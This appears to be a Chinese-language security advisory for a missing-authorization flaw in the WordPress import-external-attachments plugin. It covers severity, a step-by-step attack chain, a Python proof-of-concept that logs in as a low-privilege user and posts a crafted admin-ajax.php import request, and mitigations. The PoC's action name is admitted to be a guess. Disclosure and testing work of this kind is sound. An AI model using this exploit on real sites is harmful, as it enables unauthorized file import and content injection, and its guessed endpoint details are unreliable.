CVE-2025-64245 WordPress import-external-attachments插件缺失授权漏洞

漏洞信息

漏洞编号

CVE-2025-64245

漏洞类型

缺失授权

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress import-external-attachments插件（ryanpcmcquen）

漏洞概述

CVE-2025-64245是WordPress插件import-external-attachments中的一个中等严重性安全漏洞。该漏洞类型为缺失授权（Missing Authorization），属于访问控制安全缺陷。漏洞源于插件在实现外部附件导入功能时，未正确配置访问控制安全级别，导致低权限用户可以执行超出其权限范围的敏感操作。攻击者可以利用此漏洞，在仅拥有WordPress低权限账户（如订阅者或贡献者角色）的情况下，调用导入外部附件的功能，可能导致恶意内容注入或站点资源被滥用。此漏洞影响插件1.5.12及以下所有版本，由于该插件用于批量导入外部资源，漏洞被利用后可能影响网站的完整性、数据安全以及服务器资源。漏洞由Patchstack安全团队审计发现并披露，建议用户及时更新至最新修复版本。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（失效的访问控制）类别。import-external-attachments插件在实现外部附件导入功能时，缺少必要的权限检查和授权验证机制。具体问题在于：1）插件的导入功能未对用户角色进行充分的权限验证；2）低权限用户可以构造特定请求调用本应仅限管理员操作的导入功能；3）缺少CSRF令牌验证或nonce检查，存在潜在的CSRF攻击风险。攻击者需要首先在目标WordPress站点注册一个低权限账户，然后构造恶意请求发送到/wp-admin/admin-ajax.php或类似的API端点，触发import-external-attachments的导入功能。由于插件直接处理外部URL资源，攻击者可以指定任意外部资源链接，可能导致：1）将恶意文件导入到WordPress媒体库；2）消耗服务器带宽和存储资源；3）通过外部资源注入恶意代码到页面内容中。CVSS 3.1向量显示该漏洞可通过网络远程利用，需要低权限认证但无需用户交互，对完整性的影响为低级别。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者访问目标WordPress站点，确认是否安装并启用import-external-attachments插件，识别插件版本是否在受影响范围内（<=1.5.12）

STEP 2

步骤2

获取低权限账户：攻击者在目标站点注册一个新账户（如订阅者角色）或利用已有的低权限账户登录WordPress

STEP 3

步骤3

构造恶意请求：攻击者分析插件的AJAX端点（如admin-ajax.php），构造包含外部恶意URL的导入请求，绕过本应存在的权限检查

STEP 4

步骤4

触发漏洞利用：发送构造的请求到WordPress站点，插件在未充分验证权限的情况下处理外部资源导入请求

STEP 5

步骤5

达成攻击效果：恶意外部资源被导入，可能导致恶意文件植入、服务器资源消耗、内容注入或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64245 PoC - Missing Authorization in import-external-attachments plugin
# Target: WordPress site with import-external-attachments plugin <= 1.5.12

def exploit_cve_2025_64245(target_url, username, password, malicious_url):
    """
    Exploit for Missing Authorization vulnerability in import-external-attachments plugin
    This PoC demonstrates how a low-privilege user can trigger external attachment import
    """
    session = requests.Session()
    
    # Step 1: Login as low-privilege user (subscriber/contributor role)
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful as low-privilege user")
    
    # Step 2: Trigger the vulnerable import function via AJAX
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # The vulnerable action may vary, common patterns:
    # - import_external_attachments
    # - iea_import
    # - wp_ajax_import_external_attachments
    exploit_data = {
        'action': 'import_external_attachments',  # May need to identify correct action name
        'urls[]': [malicious_url],  # External URL to import
        'post_id': '0'
    }
    
    resp = session.post(ajax_url, data=exploit_data)
    
    if resp.status_code == 200:
        print("[+] Exploit request sent successfully")
        print(f"[*] Response: {resp.text[:500]}")
        return True
    else:
        print(f"[-] Exploit failed with status {resp.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <malicious_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    url = sys.argv[4]
    
    exploit_cve_2025_64245(target, user, pwd, url)

影响范围

import-external-attachments <= 1.5.12

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）临时禁用import-external-attachments插件；2）使用WordPress权限控制插件限制低权限用户的AJAX操作权限；3）通过.htaccess或Nginx配置限制admin-ajax.php的访问来源；4）启用Web应用防火墙（WAF）规则检测异常的导入请求模式；5）监控wp-content目录的文件变化，及时发现可疑文件上传行为。建议尽快升级到插件最新版本以获得完整的安全防护。